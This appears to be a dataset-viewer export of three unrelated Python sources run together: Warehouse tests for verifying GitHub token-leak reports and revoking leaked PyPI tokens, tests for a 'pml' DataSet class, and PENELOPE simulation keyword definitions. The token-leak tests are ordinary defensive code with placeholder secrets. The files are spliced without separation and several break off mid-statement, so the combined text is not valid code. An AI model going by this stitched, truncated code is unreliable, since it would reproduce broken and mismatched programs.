input
stringlengths 2.65k
237k
| output
stringclasses 1
value |
---|---|
<filename>tests/unit/integration/github/test_utils.py
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import json
import time
import uuid
import pretend
import pytest
import requests
from warehouse.integrations.github import tasks, utils
def test_token_leak_matcher_extract():
with pytest.raises(NotImplementedError):
utils.TokenLeakMatcher().extract("a")
def test_plain_text_token_leak_matcher_extract():
assert utils.PlainTextTokenLeakMatcher().extract("a") == "a"
def test_invalid_token_leak_request():
exc = utils.InvalidTokenLeakRequest("a", "b")
assert str(exc) == "a"
assert exc.reason == "b"
@pytest.mark.parametrize(
"record, error, reason",
[
(None, "Record is not a dict but: None", "format"),
({}, "Record is missing attribute(s): token, type, url", "format"),
(
{"type": "not_found", "token": "a", "url": "b"},
"Matcher with code not_found not found. "
"Available codes are: failer, pypi_api_token",
"invalid_matcher",
),
(
{"type": "failer", "token": "a", "url": "b"},
"Cannot extract token from recieved match",
"extraction",
),
],
)
def test_token_leak_disclosure_request_from_api_record_error(record, error, reason):
class MyFailingMatcher(utils.TokenLeakMatcher):
name = "failer"
def extract(self, text):
raise utils.ExtractionFailed()
with pytest.raises(utils.InvalidTokenLeakRequest) as exc:
utils.TokenLeakDisclosureRequest.from_api_record(
record, matchers={"failer": MyFailingMatcher(), **utils.TOKEN_LEAK_MATCHERS}
)
assert str(exc.value) == error
assert exc.value.reason == reason
def test_token_leak_disclosure_request_from_api_record():
request = utils.TokenLeakDisclosureRequest.from_api_record(
{"type": "pypi_api_token", "token": "<PASSWORD>", "url": "http://example.com"}
)
assert request.token == "<PASSWORD>"
assert request.public_url == "http://example.com"
class TestCache:
def test_set(self):
cache = utils.PublicKeysCache(cache_time=10)
cache.set(now=1, value="foo")
assert cache.cached_at == 1
assert cache.cache == "foo"
def test_get_no_cache(self):
cache = utils.PublicKeysCache(cache_time=10)
with pytest.raises(utils.CacheMiss):
cache.get(now=1)
def test_get_old_cache(self):
cache = utils.PublicKeysCache(cache_time=10)
cache.set(now=5, value="foo")
with pytest.raises(utils.CacheMiss):
cache.get(now=20)
def test_get_valid(self):
cache = utils.PublicKeysCache(cache_time=10)
cache.set(now=5, value="foo")
assert cache.get(now=10) == "foo"
class TestGitHubTokenScanningPayloadVerifier:
def test_init(self):
metrics = pretend.stub()
session = pretend.stub()
token = "api_token"
url = "http://foo"
cache = utils.PublicKeysCache(cache_time=12)
verifier = utils.GitHubTokenScanningPayloadVerifier(
api_url=url,
session=session,
metrics=metrics,
api_token=token,
public_keys_cache=cache,
)
assert verifier._session is session
assert verifier._metrics is metrics
assert verifier._api_token == token
assert verifier._api_url == url
assert verifier._public_keys_cache is cache
def test_verify_cache_miss(self):
# Example taken from
# https://gist.github.com/ewjoachim/7dde11c31d9686ed6b4431c3ca166da2
meta_payload = {
"public_keys": [
{
"key_identifier": "90a421169f0a406205f1563a953312f0be898d3c"
"<KEY>",
"key": "-----BEGIN PUBLIC KEY-----\n"
"<KEY>"
"q\nkCmRCBnYERxZanmcpzQSXs1X/<KEY>"
"-----END PUBLIC KEY-----",
"is_current": True,
}
]
}
response = pretend.stub(
json=lambda: meta_payload, raise_for_status=lambda: None
)
session = pretend.stub(get=lambda *a, **k: response)
metrics = pretend.stub(increment=pretend.call_recorder(lambda str: None))
cache = utils.PublicKeysCache(cache_time=12)
verifier = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=session,
metrics=metrics,
api_token="<PASSWORD>",
public_keys_cache=cache,
)
key_id = "<KEY>"
signature = (
"MEQCIAfgjgz6Ou/3DXMYZBervz1TKCHFsvwMcbuJhNZse622AiAG86/"
"cku2XdcmFWNHl2WSJi2fkE8t+auvB24eURaOd2A=="
)
payload = (
b'[{"type":"github_oauth_token","token":"cb4985f91<PASSWORD>c0234202299'
b'f43808034d7f5","url":" https://github.com/github/faketestrepo/blob/'
b'b0dd59c0b500650cacd4551ca5989a6194001b10/production.env"}]'
)
assert (
verifier.verify(payload=payload, key_id=key_id, signature=signature) is True
)
assert metrics.increment.calls == [
pretend.call("warehouse.token_leak.github.auth.cache.miss"),
pretend.call("warehouse.token_leak.github.auth.success"),
]
def test_verify_cache_hit(self):
session = pretend.stub()
metrics = pretend.stub(increment=pretend.call_recorder(lambda str: None))
cache = utils.PublicKeysCache(cache_time=12)
cache.cached_at = time.time()
cache.cache = [
{
"key_id": "90a421169f0a406205f1563a953312f0be898d3c"
"<KEY>",
"key": "-----BEGIN PUBLIC KEY-----\n"
"<KEY>"
"q\nkCmRCBnYERxZanmcpzQSXs1X/AljlKkbJ8qpVIW4clayyef9gWhFbNHWAA==\n"
"-----END PUBLIC KEY-----",
}
]
verifier = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=session,
metrics=metrics,
api_token="<PASSWORD>",
public_keys_cache=cache,
)
key_id = "<KEY>"
signature = (
"MEQCIAfgjgz6Ou/3DXMYZBervz1TKCHFsvwMcbuJhNZse622AiAG86/"
"cku2XdcmFWNHl2WSJi2fkE8t+auvB24eURaOd2A=="
)
payload = (
b'[{"type":"github_oauth_token","token":"cb<PASSWORD>'
b'f43808034d7f5","url":" https://github.com/github/faketestrepo/blob/'
b'b0dd59c0b500650cacd4551ca5989a6194001b10/production.env"}]'
)
assert (
verifier.verify(payload=payload, key_id=key_id, signature=signature) is True
)
assert metrics.increment.calls == [
pretend.call("warehouse.token_leak.github.auth.cache.hit"),
pretend.call("warehouse.token_leak.github.auth.success"),
]
def test_verify_error(self):
metrics = pretend.stub(increment=pretend.call_recorder(lambda str: None))
cache = utils.PublicKeysCache(cache_time=12)
verifier = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=pretend.stub(),
metrics=metrics,
api_token="<PASSWORD>",
public_keys_cache=cache,
)
verifier._retrieve_public_key_payload = pretend.raiser(
utils.InvalidTokenLeakRequest("Bla", "bla")
)
assert verifier.verify(payload={}, key_id="a", signature="a") is False
assert metrics.increment.calls == [
pretend.call("warehouse.token_leak.github.auth.cache.miss"),
pretend.call("warehouse.token_leak.github.auth.error.bla"),
]
def test_headers_auth_no_token(self):
headers = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=pretend.stub(),
metrics=pretend.stub(),
api_token=None,
public_keys_cache=pretend.stub(),
)._headers_auth()
assert headers == {}
def test_headers_auth_token(self):
headers = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=pretend.stub(),
metrics=pretend.stub(),
api_token="<PASSWORD>-token",
public_keys_cache=pretend.stub(),
)._headers_auth()
assert headers == {"Authorization": "token api-token"}
def test_retrieve_public_key_payload(self):
meta_payload = {
"public_keys": [
{
"key_identifier": "90a421169f0a406205f1563a953312f0be898d3c"
"<KEY>",
"key": "-----BEGIN PUBLIC KEY-----\n"
"<KEY>"
"<KEY>"
"-----END PUBLIC KEY-----",
"is_current": True,
}
]
}
response = pretend.stub(
json=lambda: meta_payload, raise_for_status=lambda: None
)
session = pretend.stub(get=pretend.call_recorder(lambda *a, **k: response))
metrics = pretend.stub(increment=pretend.call_recorder(lambda str: None))
verifier = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=session,
metrics=metrics,
api_token="api-token",
public_keys_cache=pretend.stub(),
)
assert verifier._retrieve_public_key_payload() == meta_payload
assert session.get.calls == [
pretend.call(
"http://foo",
headers={"Authorization": "token api-token"},
)
]
def test_get_cached_public_key_cache_hit(self):
metrics = pretend.stub()
session = pretend.stub()
cache = utils.PublicKeysCache(cache_time=12)
cache_value = pretend.stub()
cache.set(now=time.time(), value=cache_value)
verifier = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=session,
metrics=metrics,
public_keys_cache=cache,
)
assert verifier._get_cached_public_keys() is cache_value
def test_get_cached_public_key_cache_miss_no_cache(self):
metrics = pretend.stub()
session = pretend.stub()
cache = utils.PublicKeysCache(cache_time=12)
verifier = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=session,
metrics=metrics,
public_keys_cache=cache,
)
with pytest.raises(utils.CacheMiss):
verifier._get_cached_public_keys()
def test_retrieve_public_key_payload_http_error(self):
response = pretend.stub(
status_code=418,
text="I'm a teapot",
raise_for_status=pretend.raiser(requests.HTTPError),
)
session = pretend.stub(
get=lambda *a, **k: response,
)
verifier = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=session,
metrics=pretend.stub(),
public_keys_cache=pretend.stub(),
)
with pytest.raises(utils.GitHubPublicKeyMetaAPIError) as exc:
verifier._retrieve_public_key_payload()
assert str(exc.value) == "Invalid response code 418: I'm a teapot"
assert exc.value.reason == "public_key_api.status.418"
def test_retrieve_public_key_payload_json_error(self):
response = pretend.stub(
text="Still a non-json teapot",
json=pretend.raiser(json.JSONDecodeError("", "", 3)),
raise_for_status=lambda: None,
)
session = pretend.stub(get=lambda *a, **k: response)
verifier = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=session,
metrics=pretend.stub(),
public_keys_cache=pretend.stub(),
)
with pytest.raises(utils.GitHubPublicKeyMetaAPIError) as exc:
verifier._retrieve_public_key_payload()
assert str(exc.value) == "Non-JSON response received: Still a non-json teapot"
assert exc.value.reason == "public_key_api.invalid_json"
def test_retrieve_public_key_payload_connection_error(self):
session = pretend.stub(get=pretend.raiser(requests.ConnectionError))
verifier = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=session,
metrics=pretend.stub(),
public_keys_cache=pretend.stub(),
)
with pytest.raises(utils.GitHubPublicKeyMetaAPIError) as exc:
verifier._retrieve_public_key_payload()
assert str(exc.value) == "Could not connect to GitHub"
assert exc.value.reason == "public_key_api.network_error"
def test_extract_public_keys(self):
meta_payload = {
"public_keys": [
{
"key_identifier": "90a421169f0a406205f1563a953312f0be898d3c"
"<KEY>",
"key": "-----BEGIN PUBLIC KEY-----\n"
"<KEY>"
"<KEY>"
"-----END PUBLIC KEY-----",
"is_current": True,
}
]
}
cache = utils.PublicKeysCache(cache_time=12)
verifier = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=pretend.stub(),
metrics=pretend.stub(),
public_keys_cache=cache,
)
keys = verifier._extract_public_keys(pubkey_api_data=meta_payload)
assert keys == [
{
"key": "-----<KEY>"
"<KEY>"
"<KEY>-----END PUBLIC KEY-----",
"key_id": "90a421169f0a406205f1563a953312f0be"
"<KEY>",
}
]
assert cache.cache == keys
@pytest.mark.parametrize(
"payload, expected",
[
([], "Payload is not a dict but: []"),
({}, "Payload misses 'public_keys' attribute"),
({"public_keys": None}, "Payload 'public_keys' attribute is not a list"),
({"public_keys": [None]}, "Key is not a dict but: None"),
(
{"public_keys": [{}]},
"Missing attribute in key: ['key', 'key_identifier']",
),
(
{"public_keys": [{"key": "a"}]},
"Missing attribute in key: ['key_identifier']",
),
(
{"public_keys": [{"key_identifier": "a"}]},
"Missing attribute in key: ['key']",
),
],
)
def test_extract_public_keys_error(self, payload, expected):
cache = utils.PublicKeysCache(cache_time=12)
verifier = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=pretend.stub(),
metrics=pretend.stub(),
public_keys_cache=cache,
)
with pytest.raises(utils.GitHubPublicKeyMetaAPIError) as exc:
list(verifier._extract_public_keys(pubkey_api_data=payload))
assert exc.value.reason == "public_key_api.format_error"
assert str(exc.value) == expected
assert cache.cache is None
def test_check_public_key(self):
verifier = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=pretend.stub(),
metrics=pretend.stub(),
public_keys_cache=pretend.stub(),
)
keys = [
{"key_id": "a", "key": "b"},
{"key_id": "c", "key": "d"},
]
assert verifier._check_public_key(github_public_keys=keys, key_id="c") == "d"
def test_check_public_key_error(self):
verifier = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=pretend.stub(),
metrics=pretend.stub(),
public_keys_cache=pretend.stub(),
)
with pytest.raises(utils.InvalidTokenLeakRequest) as exc:
verifier._check_public_key(github_public_keys=[], key_id="c")
assert str(exc.value) == "Key c not found in github public keys"
assert exc.value.reason == "wrong_key_id"
def test_check_signature(self):
verifier = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=pretend.stub(),
metrics=pretend.stub(),
public_keys_cache=pretend.stub(),
)
public_key = (
"-----BEGIN PUBLIC KEY-----\n"
"<KEY>"
"<KEY>"
"-----END PUBLIC KEY-----"
)
signature = (
"MEQCIAfgjgz6Ou/3DXMYZBervz1TKCHFsvwMcbuJhNZse622AiAG86/"
"cku2XdcmFWNHl2WSJi2fkE8t+auvB24eURaOd2A=="
)
payload = (
b'[{"type":"github_oauth_token","token":"<PASSWORD>'
b'f43808034d7f5","url":" https://github.com/github/faketestrepo/blob/'
b'b0dd59c0b500650cacd4551ca5989a6194001b10/production.env"}]'
)
assert (
verifier._check_signature(
payload=payload, public_key=public_key, signature=signature
)
is None
)
def test_check_signature_invalid_signature(self):
verifier = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=pretend.stub(),
metrics=pretend.stub(),
public_keys_cache=pretend.stub(),
)
public_key = (
"-----BEGIN PUBLIC KEY-----\n"
"MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE9MJJHnMfn2+H4xL4YaPDA4RpJqU"
"q\nkCmRCBnYERxZanmcpzQSXs1X/AljlKkbJ8qpVIW4clayyef9gWhFbNHWAA==\n"
"-----END PUBLIC KEY-----"
)
# Changed the initial N for an M
signature = (
"NEQCIAfgjgz6Ou/3DXMYZBervz1TKCHFsvwMcbuJhNZse622AiAG86/"
"cku2XdcmFWNHl2WSJi2fkE8t+auvB24eURaOd2A=="
)
payload = (
b'[{"type":"github_oauth_token","token":"<PASSWORD>'
b'f43808034d7f5","url":" https://github.com/github/faketestrepo/blob/'
b'b0dd59c0b500650cacd4551ca5989a6194001b10/production.env"}]'
)
with pytest.raises(utils.InvalidTokenLeakRequest) as exc:
verifier._check_signature(
payload=payload, public_key=public_key, signature=signature
)
assert str(exc.value) == "Invalid signature"
assert exc.value.reason == "invalid_signature"
def test_check_signature_invalid_crypto(self):
verifier = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=pretend.stub(),
metrics=pretend.stub(),
public_keys_cache=pretend.stub(),
)
public_key = ""
signature = ""
payload = "yeah, nope, that won't pass"
with pytest.raises(utils.InvalidTokenLeakRequest) as exc:
verifier._check_signature(
payload=payload, public_key=public_key, signature=signature
)
assert str(exc.value) == "Invalid cryptographic values"
assert exc.value.reason == "invalid_crypto"
def test_analyze_disclosure(monkeypatch):
metrics = collections.Counter()
def metrics_increment(key):
metrics.update([key])
user_id = uuid.UUID(bytes=b"0" * 16)
user = pretend.stub(id=user_id)
database_macaroon = pretend.stub(
user=user, id=12, caveats={"permissions": "user"}, description="foo"
)
find = pretend.call_recorder(lambda *a, **kw: database_macaroon)
delete = pretend.call_recorder(lambda *a, **kw: None)
record_event = pretend.call_recorder(lambda *a, **kw: None)
svc = {
utils.IMetricsService: pretend.stub(increment=metrics_increment),
utils.IMacaroonService: pretend.stub(
find_from_raw=find, delete_macaroon=delete
),
utils.IUserService: pretend.stub(record_event=record_event),
}
request = pretend.stub(find_service=lambda iface, context: svc[iface])
send_email = pretend.call_recorder(lambda *a, **kw: None)
monkeypatch.setattr(utils, "send_token_compromised_email_leak", send_email)
utils.analyze_disclosure(
request=request,
disclosure_record={
"type": "pypi_api_token",
"token": "pypi-<PASSWORD>",
"url": "http://example.com",
},
origin="github",
)
assert metrics == {
"warehouse.token_leak.github.recieved": 1,
"warehouse.token_leak.github.processed": 1,
"warehouse.token_leak.github.valid": 1,
}
assert send_email.calls == [
pretend.call(request, user, public_url="http://example.com", origin="github")
]
assert find.calls == [pretend.call(raw_macaroon="pypi-1234")]
assert delete.calls == [pretend.call(macaroon_id="12")]
assert record_event.calls == [
pretend.call(
user_id,
tag="account:api_token:removed_leak",
ip_address="127.0.0.1",
additional={
"macaroon_id": | |
<gh_stars>1-10
# Copyright (C) 2012 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Unit tests for the model module.
@author: drusk
"""
import unittest
import numpy as np
import pandas as pd
from hamcrest import (assert_that, contains, contains_inanyorder, has_length,
equal_to)
from pml.data.model import DataSet, as_dataset
from pml.data import loader
from pml.utils.errors import InconsistentSampleIdError
from pml.utils.errors import UnlabelledDataSetError
from test import base_tests
from test.matchers.pml_matchers import equals_dataset
from test.matchers.pandas_matchers import equals_series, equals_dataframe
class DataSetTest(base_tests.BaseDataSetTest, base_tests.BaseFileLoadingTest):
def test_create_dataset_from_numpy_array(self):
as_list = [[0, 1], [2, 3]]
np_array = np.array(as_list)
dataset = DataSet(np_array)
assert_that(dataset, equals_dataset(as_list))
def test_reduce_rows(self):
dataset = DataSet([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
reduced = dataset.reduce_rows(sum)
assert_that(reduced.values, contains(6, 15, 24))
def test_reduce_features(self):
dataset = DataSet([[4, 9, 8], [2, 1, 7], [5, 6, 1]])
reduced = dataset.reduce_features(min)
assert_that(reduced.values, contains(2, 1, 1))
def test_drop_column(self):
original = DataSet([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
self.assertEqual(original.num_features(), 3)
filtered = original.drop_column(1)
self.assertEqual(filtered.num_features(), 2)
assert_that(filtered, equals_dataset([[1, 3], [4, 6], [7, 9]]))
# make sure original unchanged
self.assertEqual(original.num_features(), 3)
assert_that(original, equals_dataset([[1, 2, 3], [4, 5, 6],
[7, 8, 9]]))
def test_drop_column_keeps_labels(self):
original = self.create_dataset(labels=["cat", "dog", "bird"],
num_features=3)
filtered = original.drop_column(1)
assert_that(filtered.get_labels(), contains("cat", "dog", "bird"))
def test_drop_empty_samples(self):
df = pd.DataFrame([[1, 2, np.NAN], [np.NAN, np.NAN, np.NAN], [7, 8, 9]])
original = DataSet(df, labels=["a", "b", "c"])
filtered = original.drop_empty_samples()
assert_that(filtered.feature_list(), has_length(3))
assert_that(filtered.num_samples(), equal_to(2))
assert_that(filtered, equals_dataset([[1, 2, np.NAN], [7, 8, 9]]))
assert_that(filtered.get_labels(), contains("a", "c"))
def test_drop_empty_samples_original_unchanged(self):
data_list = [[1, 2, np.NAN], [np.NAN, np.NAN, np.NAN], [7, 8, 9]]
label_list = ["a", "b", "c"]
original = DataSet(pd.DataFrame(data_list), labels=label_list)
filtered = original.drop_empty_samples()
filtered.set_column(0, [-1, -1])
filtered.labels[0] = "z"
assert_that(original, equals_dataset(data_list))
assert_that(original.get_labels(), contains(*label_list))
def test_get_column(self):
dataset = DataSet([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
column1 = dataset.get_column(1)
assert_that(column1.values, contains(2, 5, 8))
def test_get_column_set_value(self):
dataset = DataSet([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
dataset.get_column(1)[:] = 1
assert_that(dataset.get_column(1), contains(1, 1, 1))
def test_set_column(self):
dataset = DataSet([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
dataset.set_column(1, [11, 11, 11])
assert_that(dataset, equals_dataset([[1, 11, 3], [4, 11, 6],
[7, 11, 9]]))
def test_set_new_column(self):
dataset = DataSet([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
dataset.set_column(3, [11, 11, 11])
assert_that(dataset, equals_dataset([[1, 2, 3, 11], [4, 5, 6, 11],
[7, 8, 9, 11]]))
def test_slice_features_list_string(self):
df = pd.DataFrame([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
columns=["weight", "height", "age"])
labels = ["m", "f", "m"]
dataset = DataSet(df, labels=labels)
sliced = dataset.slice_features(["weight", "height"])
assert_that(sliced, equals_dataset([[1, 2], [4, 5], [7, 8]]))
assert_that(sliced.feature_list(), contains("weight", "height"))
assert_that(sliced.get_labels(), contains(*labels))
def test_slice_features_list_indices(self):
df = pd.DataFrame([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
labels = ["m", "f", "m"]
dataset = DataSet(df, labels=labels)
sliced = dataset.slice_features([1, 2])
assert_that(sliced, equals_dataset([[2, 3], [5, 6], [8, 9]]))
assert_that(sliced.feature_list(), contains(1, 2))
assert_that(sliced.get_labels(), contains(*labels))
def test_slice_features_original_unchanged(self):
df = pd.DataFrame([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
columns=["weight", "height", "age"])
labels = ["m", "f", "m"]
dataset = DataSet(df, labels=labels)
sliced = dataset.slice_features(["weight", "height"])
# Modify sliced data
sliced.set_column("weight", [0, 0, 0])
sliced.labels[0] = "x"
# Check that it was indeed changed
assert_that(sliced.get_column("weight"), contains(0, 0, 0))
assert_that(sliced.get_labels(), contains("x", "f", "m"))
# Verify it was not changed in the original dataset
assert_that(dataset.get_column("weight"), contains(1, 4, 7))
assert_that(dataset.get_labels(), contains(*labels))
def test_get_rows(self):
dataset = DataSet([[1, 2], [3, 4], [5, 6], [7, 8]])
selection = dataset.get_rows([1, 3])
self.assertEqual(selection.num_samples(), 2)
assert_that(selection, equals_dataset([[3, 4], [7, 8]]))
def test_get_labelled_rows(self):
dataset = DataSet([[1, 2], [3, 4], [5, 6], [7, 8]],
labels=["a", "a", "b", "b"])
selection = dataset.get_rows([1, 3])
self.assertEqual(selection.num_samples(), 2)
self.assertTrue(selection.is_labelled())
# TODO incorporate labels equals_series into DataSet matcher?
assert_that(selection, equals_dataset([[3, 4], [7, 8]]))
assert_that(selection.get_labels(), equals_series({1: "a", 3: "b"}))
def test_get_label_value_counts(self):
dataset = DataSet([[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12]],
labels=["a", "b", "b", "c", "a", "b"])
expected = {"a": 2, "b": 3, "c": 1}
value_counts = dataset.get_label_value_counts()
assert_that(value_counts, equals_series(expected))
assert_that(value_counts.index, contains("b", "a", "c"))
def test_get_label_set(self):
dataset = DataSet([[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12]],
labels=["a", "b", "b", "c", "a", "b"])
assert_that(dataset.get_label_set(), contains_inanyorder("a", "b", "c"))
def test_get_label_empty_set(self):
dataset = DataSet([[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12]])
assert_that(dataset.get_label_set(), has_length(0))
def test_get_label_value_counts_no_labels(self):
dataset = DataSet([[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12]])
assert_that(dataset.get_label_value_counts(), equals_series({}))
def test_split(self):
dataset = DataSet([[1, 2], [3, 4], [5, 6], [7, 8]])
first, second = dataset.split(0.5)
self.assertEqual(first.num_samples(), 2)
assert_that(first, equals_dataset([[1, 2], [3, 4]]))
self.assertEqual(second.num_samples(), 2)
assert_that(second, equals_dataset([[5, 6], [7, 8]]))
def test_unequal_split(self):
dataset = DataSet([[1, 2], [3, 4], [5, 6], [7, 8]])
first, second = dataset.split(0.3)
self.assertEqual(first.num_samples(), 1)
assert_that(first, equals_dataset([[1, 2]]))
self.assertEqual(second.num_samples(), 3)
assert_that(second, equals_dataset([[3, 4], [5, 6], [7, 8]]))
def test_split_0(self):
dataset = DataSet([[1, 2], [3, 4], [5, 6], [7, 8]])
first, second = dataset.split(0)
self.assertEqual(first.num_samples(), 0)
assert_that(first, equals_dataset([]))
self.assertEqual(second.num_samples(), 4)
assert_that(second, equals_dataset([[1, 2], [3, 4], [5, 6], [7, 8]]))
def test_split_invalid_percent(self):
dataset = DataSet([[1, 2], [3, 4], [5, 6], [7, 8]])
self.assertRaises(ValueError, dataset.split, 50)
def test_split_random(self):
dataset = DataSet([[1, 2], [3, 4], [5, 6], [7, 8]])
first, second = dataset.split(0.5, random=True)
# since the split is random, can't assert that first or second
# contain particular rows, just the number of rows
self.assertEqual(first.num_samples(), 2)
self.assertEqual(second.num_samples(), 2)
def test_fill_missing(self):
dataset = DataSet([[1, np.NaN, 3], [np.NaN, 5, np.NaN]])
dataset.fill_missing(0)
assert_that(dataset, equals_dataset([[1, 0, 3], [0, 5, 0]]))
def test_fill_missing_with_feature_means(self):
dataset = DataSet([[2, np.NaN, np.NaN], [np.NaN, 6, 10],
[5, 4, np.NaN]])
dataset.fill_missing_with_feature_means()
assert_that(dataset, equals_dataset([[2, 5, 10], [3.5, 6, 10],
[5, 4, 10]]))
def test_fill_missing_with_feature_means_feature_all_empty(self):
dataset = DataSet([[2, np.NaN, np.NaN], [7, np.NaN, 10],
[5, np.NaN, np.NaN]])
dataset.fill_missing_with_feature_means()
assert_that(dataset, equals_dataset([[2, 0, 10], [7, 0, 10],
[5, 0, 10]]))
def test_split_labelled(self):
dataset = DataSet([[1, 2], [3, 4], [5, 6], [7, 8]],
labels=["b", "b", "b", "a"])
first, second = dataset.split(0.5)
self.assertTrue(first.is_labelled())
assert_that(first.get_labels(), equals_series({0: "b", 1: "b"}))
self.assertTrue(second.is_labelled())
assert_that(second.get_labels(), equals_series({2: "b", 3: "a"}))
def test_split_in_half_using_labels(self):
labels = ["a", "a", "a", "a", "b", "b", "b", "b"]
dataset = self.create_dataset(labels=labels,
sample_ids=range(len(labels)))
first, second = dataset.split(0.5, using_labels=True)
assert_that(first.get_labels(),
contains_inanyorder("a", "a", "b", "b"))
assert_that(second.get_labels(),
contains_inanyorder("a", "a", "b", "b"))
def test_split_ratio_using_labels(self):
labels = ["a", "a", "b", "a", "b", "a", "b", "b", "a", "a"]
dataset = self.create_dataset(labels=labels,
sample_ids=range(len(labels)))
first, second = dataset.split(0.75, using_labels=True)
assert_that(first.get_labels(),
contains_inanyorder("a", "a", "a", "a", "b", "b", "b"))
assert_that(second.get_labels(),
contains_inanyorder("a", "a", "b"))
def test_split_unlabelled_using_labels(self):
dataset = self.create_dataset(labels=None)
self.assertRaises(
UnlabelledDataSetError,
dataset.split,
0.5, using_labels=True
)
def test_split_missing_indices(self):
labels = pd.Series(["a", "b", "c", "d"], index=[1, 2, 3, 5])
dataset = self.create_dataset(sample_ids=[1, 2, 3, 5], labels=labels)
first, second = dataset.split(0.5)
assert_that(first.get_sample_ids(), contains(1, 2))
assert_that(first.get_labels(), contains("a", "b"))
assert_that(second.get_sample_ids(), contains(3, 5))
assert_that(second.get_labels(), contains("c", "d"))
def test_get_row(self):
dataset = DataSet([[1, 2], [3, 4], [5, 6], [7, 8]])
row = dataset.get_row(1)
assert_that(row.values, contains(3, 4))
# check that changes made to selected row are reflected in original
row[:] = 1
assert_that(dataset.get_row(1), contains(1, 1))
def test_get_row_by_id(self):
df = pd.DataFrame([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
index=["V01", "V02", "V03"])
dataset = DataSet(df)
| |
the material structure are normally identified
by the sequential labels assigned by PENGEOM. For complex
geometries, however, it may be more practical to employ user
labels, i.e., the four-character strings that identify the
body in the geometry definition file. In PENMAIN (and only
in the parts of the code that follow the definition of the
geometry), a body can be specified by giving either its
PENGEOM numerical label or its user label enclosed in a
pair of apostrophes (e.g., 'BOD1'). However, bodies that
result from the cloning of modules (as well as those defined
in an INCLUDEd geometry file) do not have a user label and
only the PENGEOM numerical label is acceptable.
"""
def __init__(self):
super().__init__("GEOMFN", (str,), comment="Geometry file, up to 20 chars")
def set(self, filename):
"""
Sets filename.
Args:
filename (str): File name of material file (up to 20 characters).
"""
super().set(filename)
class DSMAX(KeywordSequence):
"""Maximum step length of electrons and positrons in body.
.. note::
This parameter is important only for thin bodies; it should be given a
value of the order of one tenth of the body thickness or less.
"""
def __init__(self, maxlength=5000):
keyword = TypeKeyword(
"DSMAX", (int, float), comment="KB, maximum step length in body KB"
)
super().__init__(keyword, maxlength)
def add(self, kb, dsmax):
"""
Sets maximum step length.
Args:
kb (int): Index of body.
dsmax: Maximum step length in cm.
"""
return super().add(kb, dsmax)
class EABSB(KeywordSequence):
"""Local absorption energies EABSB(KPAR,KB) of particles of type KPAR in body KB.
These values must be larger than EABS(KPAR,M), where M is the material of body KB. When the
particle is moving within body KB, the absorption energy
EABS(KPAR,M) is temporarily set equal to EABSB(KPAR,KB).
Thus, the simulation of the particle history is discontinued
when the energy becomes less than EABSB(KPAR,KB). This
feature can be used, e.g., to reduce the simulation work in
regions of lesser interest.
"""
def __init__(self, maxlength=5000):
keyword = TypeKeyword(
"EABSB",
(int, float, float, float),
comment="KB, local absorption energies, EABSB(1:3)",
)
super().__init__(keyword, maxlength)
def add(self, kb, eabs1, eabs2, eabs3):
"""
Sets local absorption energies.
Args:
kb (int): Index of body.
eabs1 (float): Absorption energy of electrons in eV.
eabs2 (float): Absorption energy of photons in eV.
eabs3 (float): Absorption energy of positrons in eV.
"""
